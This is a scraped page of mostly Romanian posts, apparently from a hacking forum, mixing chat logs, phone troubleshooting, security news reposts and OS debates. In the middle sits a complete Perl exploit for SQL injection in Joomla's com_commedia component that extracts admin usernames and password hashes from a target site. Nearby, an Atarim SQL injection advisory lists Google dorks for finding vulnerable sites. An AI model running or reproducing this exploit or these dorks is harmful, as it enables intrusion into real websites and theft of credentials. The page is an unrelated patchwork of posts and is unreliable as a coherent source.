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Nu se retrage din muzica; Nu mai mancati rahat cum au facut-o si cei de dinaintea voastra. Intrebat daca sunt adevarate zvonurile de anul trecut, cum ca s-ar retrage din muzica, Cedry2k le-a raspuns: "Nu ma retrag frate, doar schimb armele". Nu se retrage Cedry2k; Poate are alte proiecte. Si faza cu "haideti la concert ca e ultimul, ca se retrage" e o strategie de marketing.
(14:49:55) alecseu: Sa-l frec pe wubi-n cur (14:49:58) madrid1000: k (14:49:59) alecseu: @madrid1000 (14:50:03) alecseu: Da-i msg la tex (14:50:05) alecseu: Da-i PM (14:50:14) alecseu: si spune-ti sa-ti dea co4ilii v2.0 (14:50:18) alecseu: sau 3.0 (14:50:21) flower-power: baa (14:50:22) alecseu: Care-l are cu licenta (14:50:27) flower-power: iar dai coailii la toti (14:50:28) fallen_angel: 3.0 e beta m? (14:50:32) fallen_angel: mai bine 2.0 (14:50:35) alecseu: Nu eu (14:50:38) alecseu: Tex da (14:53:39) alecseu: (?opte?te lui madrid1000) https://rstcenter.com/forum/memb?ers/tex da-i msg si cere-i co4ilii 2.0 [i]after 777s:[/i] (15:06:33) RST: tex se autentific? pe Chat. (15:06:38) tex: wtf (15:06:39) tex: dam si mie plz asta co4ilii 2.0 (15:06:40) tex: dam si mie plz asta co4ilii 2.0 (15:06:41) Oust: Salut Tex. (15:06:41) tex: dam si mie plz asta co4ilii 2.0 (15:06:42) tex: ) (15:06:43) flower-power: atunci ce vrei sa le faci organe (15:06:44) Oust: )) (15:06:44) tex: de 3 ori ma (15:06:46) tex: unu pe PM
Nu era nici o eroare; Pur si simplu in momentul in care incercam sa intru intr-o conversatie pentru a putea vedea/trimtie mesaje mi se bloca si ramanea in loading; Puteam sa ma intorc in meniul principal sau oridunde, dar nu Da; L-am resetat manual, din soft, toate dracoveniile. Nu e rootat. E softul original, de la mama lui; Defapt e Android 4.0.3 cu HTC Sense 4.0 Nu; Nu-l vand. Pana la final am reusit sa-l mulg si sa-l fac; Era ceva limita de mesaje / conversatie setata la 500; Am modificat la 5000 si cu greu au reusit sa sterg restul conversatiilor. Acuma se pare ca functioneaza in parametrii normali; Deocamdata. Tot nu inteleg care i-a fost problema.
Salutari. Am intampinat o problema pe HTC ONE S: Nu mai pot deschide mesajele pe telefon. Mentionez ca am Android 4.0.2. Daca aveti vreo idee, astept un raspuns. Cat de urgent.
Noi, cei din tabelul user din mysql-ul site-ului hostat la Linux Security Group iti salutam prezenta printre noi.
#!/usr/bin/perl -w ######################################## # Joomla Component (commedia) Remote SQL Exploit #----------------------------------------------------------------------------# ######################################## print "\t\t\n\n"; print "\t\n"; print "\t Daniel Barragan D4NB4R \n"; print "\t \n"; print "\t Joomla com_commedia Remote Sql Exploit \n"; print "\t\n\n"; print " :::Opciones de prefijo tabla users:::\n\n"; print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users \n\n\n"; use LWP::UserAgent; use HTTP::Request; use LWP::Simple; print ":::Opcion::: "; my $option=<STDIN>; if ($option==1){&jos_users} if ($option==2){&jml_users} if ($option==3){&muc_users} if ($option==4){&sgj_users} sub jos_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jos_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub jml_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jml_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub muc_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="muc_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub sgj_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="sgj_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } Sursa
Hackers broke into keypads at more than 60 Barnes & Noble bookstores and made off with the credit card information for customers who shopped at the stores as recently as last month. The company discovered the breach on September 14 but kept it quiet while the FBI attempted to track the hackers. Hackers broke into the point-of-sale terminals at 63 stores across the country, including locations in New York City, San Diego, Miami, and Chicago. Since discovering the breach, the company has uninstalled all 7,000 point-of-sale terminals from its hundreds of stores for examination. Although only one terminal in each of the 63 targeted stores was found to have been compromised, the company has not reinstalled the keypads. "Customers can make transactions securely today by asking booksellers to swipe their credit and signature debit cards through the card readers connected to cash registers," the company said in a statement. The company said it is advising customers to change their personal identification numbers and monitor their credit card statements. It also said it was "working with banks, payment card brands and issuers to identify accounts that may have been compromised, so banks and issuers can employ enhanced fraud security measures on potentially impacted accounts." The company said its customer database is secure and that purchases made on BarnesandNoble.com, Nook, and Nook apps were unaffected. The practice of credit card skimming has become more frequent in recent years. Last month, two Romanian men pled guilty to hacking point-of-sale terminals at hundreds of Subway sandwich stores in the U.S. to steal credit card data from more than 146,000 accounts. Sursa
E eroare de php. Nu are nici o treaba cu sqli.
ubuntu in loc de Win??
hades replied to flower-power's topic in Sisteme de operare si discutii hardware
Nimeni nu a zis ca nu poti. Era vorba de criteriile multora in momentul in care aleg OS-ul. -
Afiliere pentru site-urile cu jocuri online. [CPC].
hades replied to hades's topic in Black SEO & monetizare
Tu ai venit aici sa redeschizi topic-uri vechi ca sa iti apara link-ul din semnatura pe forum? Era evident ca vorbesc de site-urile arcade. Citeste primul post. -
ubuntu in loc de Win??
hades replied to flower-power's topic in Sisteme de operare si discutii hardware
Atatea discutii despre sistemele de operare; Nu poate nimeni sa-ti spuna ce sistem de operare e mai potrivit pentru tine. Tu stii ce vrei de la viata; Cand vine vorba de ales OS-ul, parerile sunt subiective. Trebuie sa te gandesti ce vrei sa faci, iar de-aici incolo totul depinde de tine. De ce vrei ubuntu? Pentru ca 'hackerii' folosesc linux? Atunci poti ramane pe windows, pentru ca un sistem de operare nu iti va aduce automat cunostiintele de care ai nevoie intr-un anumit domeniu. -
An FBI source communicated with Quazi Mohammad Rezwanul Ahsan Nafis on the site. Nafis was arrested trying to bomb the New York Federal Reserve. The FBI nabbed a suspected terrorist in part by using Facebook, interacting with him on the site as he allegedly plotted to set off a bomb in New York. According to a court document found by Mashable, an FBI source used Facebook to communicate with Quazi Mohammad Rezwanul Ahsan Nafis, a 21-year-old Bangladeshi citizen in the U.S. on a student visa. Those interactions helped lead to his arrest Wednesday as Nafis tried to detonate a fake car bomb near the New York Federal Reserve. Nafis is believed to have connections with Al-Qaeda. After making initial contact with Nafis, the FBI then used Facebook to communicate with him via an FBI confidential human source, or CHS. Facebook and other social media sites have been used to communicate and catch suspected terrorists and other criminals in the past. The FBI has also been trying to gain more access to the sites. Sursa In alta ordine de idei, datacenterul ala smecher de la facebook nu e sustinut din banii scosi din Facebook Ads; Se mai vand si datele utilizatorilor. Asta-i teoria conspiratiei; Si-mi place.
After a more than two-year love affair, Hacktivist collective Anonymous is distancing itself from Wikileaks. In a tweet sent from one of the many accounts controlled by Anonymous, the group said goodbye to the whistleblowing website controlled by Julian Assange. “The end of an era. We unfollowed @Wikileaks and withdraw our support. It was an awesome idea ruined by Egos. Good Bye,” the statement read. Anonymous was complaining about a change that Wikileaks made to its website earlier this week: A donation page would automatically appear every time a user tried to access the Global Intelligence Files page, Wikileaks’ latest leak. For Anonymous, this was the same as establishing a paywall, something that clashes with Wikileaks’ stated goals of transparency and public service. Anonymous also criticized Wikileaks’ founder for taking too much of a prominent role, and turning the organization into “the one man Julian Assange show.” This repudiation comes after years of mutual support. For example, When Visa and Mastercard blocked payments to Wikileaks in 2010, for example, the hacker collective organized a series of denial-of-service attacks on the two financial institutions. And just this year, in what was seen as an unprecedented collaboration, Wikileaks started publishing documents obtained by an Anonymous raid on intelligence company Stratfor. Sursa si video Nu am nici o dragoste ascunsa fata de aceasta grupare, Anonymous. Mi-a atras atentia doar scandalul dintre doua personaje marcante de pe scena securitatii IT.
Amigo; Pe wordpress se face orice. Cu rabdare si indemanare.
Pentru cei interesati: Pe site-ul Nand2Tetris gasiti un tutorial care va indruma si va explica cum cu ajutorul portilor logice (NAND, XOR, OR etc) puteti crea cunoscutul joc Tetris. Portile logice vor fi puse la un loc in module care la final vor deveni un computer. De-acolo pana la a juca un Tetris conceput de voi, mai aveti nevoie de un compiler si un sistem de operare. Aveti un "walk-through" pe site-ul de mai sus. Pentru a nu avea nevoie de componente fizice (adica de-o placa pe care sa programati portile logice) gasiti tot pe site-ul cu totorialul un simulator hardware care va fi programat HDL. Mult succes. In caz ca va apucati de treaba. Sursa
Hack into Google Chrome, and you could win $60,000, at least if you do it through Google's Pwnium 2 competition. That's just what happened to a hacker dubbed Pinkie Pie, who won the award on Tuesday by exploiting a security hole in Chrome. In an effort to shore up its browser's defenses, Google holds the competition to challenge hackers to hack their way through Chrome's security to find previously unknown holes. Tuesday's Pwnium 2 contest was held at the Hack in the Box 2012 event in Kuala Lumpur, Malaysia. "We're happy to confirm that we received a valid exploit from returning pwner Pinkie Pie," Google announced in a Chromium blog. "This pwn relies on a WebKit Scalable Vector Graphics (SVG) compromise to exploit the renderer process and a second bug in the IPC layer to escape the Chrome sandbox. Since this exploit depends entirely on bugs within Chrome to achieve code execution, it qualifies for our highest award level as a 'full Chrome exploit,' a $60,000 prize and free Chromebook." Google's Chrome team quickly jumped on the exploit as soon as it was discovered, leading to an update to the browser to patch the hole after just 10 hours. Pinkie Pie also won $60,000 in the first Pwnium competition, held earlier this year. Sursa Cu alte cuvinte, Pinkie Pie asta a impuscat $120.000 de la Google. Anul asta.
[+] Author: TUNISIAN CYBER [+] Home: 1337day.com Inj3ct0r Exploit DataBase [+] Exploit Title: Atarim SQL Injection Vulnerability [+] Date: 11-10-2012 [+] Category: WebApp [+] Google Dork: intext:"design:atarim" .php?id= intext:"design:atarim" .php?cat= [+] Tested on: Windows 7 Professionnel [+] Vendor: http://www.atarim.com/ [+] Twitter: @a0a0a5 #################################################################################### Vulnerability Description: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. The impact of this vulnerability: A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. ============================== Vulnerabilities:[SQL] ============================== Via
1. *ajuta-l, ca asa e frumos. 2. Dupa cum s-a mai spus, cel mai probabil e vorba de parole generate automat; In cazul in care nu ii este permisa logarea cu ajutorul lor, s-ar putea sa fie vorba de ceva filtru pe ip. 3. Pune-ti mana si folositi Google; Nu va vine sa credeti cate gasiti pe acolo.
Romanii au piratat cea mai importanta companie petroliera saudita!!!
hades replied to LightOfDarkness's topic in Off-topic
Te-ai pornit degeaba; E vorba de faptul ca majoritatea 'hacharilor romani' ajunsi prin ziare sunt exemple clare de copilasi scapati de sub control de parinti, care incep s-o arda aiurea pe internet, fara un background respectabil in ceea ce priveste securitatea informatica. Exemple sunt multe, o sa reamintesc aici doar de "Anonymous Romania". Nu contest faptul ca sunt exceptii de la ceea ce blamez eu, dar majoritatea cazurilor se incadreaza in profilul trasat de mine. Notorietatea castigata de copilasii acestia e produsul mizer al unor trusturi de presa la fel de mizere. -
Desteptilor, Hash-urile MD5 sunt de obicei string-uri hexadecimale de 32 caractere. Vi se pare ca vreo parola de de-acolo are 32 caractere? @AltraX: Tu criptezi "8ac4aadda6edab96c4ca" in MD5 iar apoi decritpezi HASH-ul obtinut si te miri ca rezultatul primit e chiar stringul criptat de tine? Ca eu asta inteleg, iar daca e asa, e trist.
Romanii au piratat cea mai importanta companie petroliera saudita!!!
hades replied to LightOfDarkness's topic in Off-topic
Mizerie de articol; Jurnalismul din Romania e la fel ca vestitii hackeri romani, adica la pamant. Motiv pentru care se poate spune ca nu romanii au facut asta. Titlu trist: "Am invins!". -
Din DB-uri.